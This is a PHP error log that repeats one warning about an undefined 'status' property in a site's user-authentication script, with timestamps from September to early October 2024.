Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 23:47:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 00:12:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 00:17:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 00:45:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 00:50:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 01:06:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 01:16:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 01:28:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:01:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:17:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:18:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:21:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:52:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:52:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:54:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:08:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:14:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:33:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:39:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:39:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 04:20:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 04:29:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 04:30:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 04:46:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 05:07:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 05:10:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 05:37:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 06:19:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 06:27:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 06:33:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 06:57:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 07:00:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 07:33:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 07:59:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 23:01:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 23:25:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 23:30:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 00:01:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 00:59:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 01:01:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 01:03:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 01:59:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 03:08:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 03:50:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 04:14:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 04:25:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 05:04:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 05:06:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 05:09:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 06:19:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 07:43:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 07:48:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 07:55:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 23:49:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 07:25:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 07:28:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 07:38:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 07:42:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 11:51:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:06:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:25:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:26:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:26:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:32:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 02:16:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 02:27:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 03:48:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 03:51:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 03:54:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 04:17:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 04:19:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 04:29:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 04:47:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 05:16:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 05:49:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 05:59:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:03:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:06:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:13:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:14:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:26:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 22:22:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 23:35:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 00:07:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 00:44:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 00:45:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 00:51:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 01:58:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 01:58:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 03:12:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 03:51:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 04:27:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 04:27:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 05:35:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 05:44:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 07:15:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 08:00:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 11:10:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 11:19:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 12:09:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 22:53:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 23:00:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 23:26:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 00:13:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 00:21:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 00:24:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 00:40:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 01:29:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 01:42:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 02:33:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 02:39:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 02:42:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 03:03:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 03:32:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 03:47:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 03:56:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 04:17:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 04:22:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 04:41:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 05:32:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 06:04:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 06:11:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 06:11:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 07:22:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 08:38:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 09:09:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 11:31:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 12:25:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 12:56:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 23:23:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 00:01:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 00:15:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 01:00:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 01:29:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 01:38:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:07:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:08:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:10:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:13:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:13:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:57:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:01:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:02:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:04:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:10:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:49:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:59:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:07:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:16:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:27:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:27:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:31:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:59:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 05:53:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 06:05:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 06:38:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 08:22:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 08:39:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 08:41:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 22:33:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 23:29:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 23:30:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 00:04:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 00:12:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 00:13:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 00:48:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 01:24:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 01:28:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 01:36:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 01:48:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 02:04:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 02:07:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 02:40:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 03:43:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 03:48:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 04:23:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 04:32:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 04:58:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 05:23:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 05:43:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 06:30:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 06:33:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 06:42:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 06:42:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 08:02:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 09:23:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 10:16:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 11:16:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 11:19:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 12:11:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 22:13:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 22:31:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 23:36:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 23:39:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 01:12:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 01:31:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 01:50:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:16:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:22:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 02:26:45 UTC] 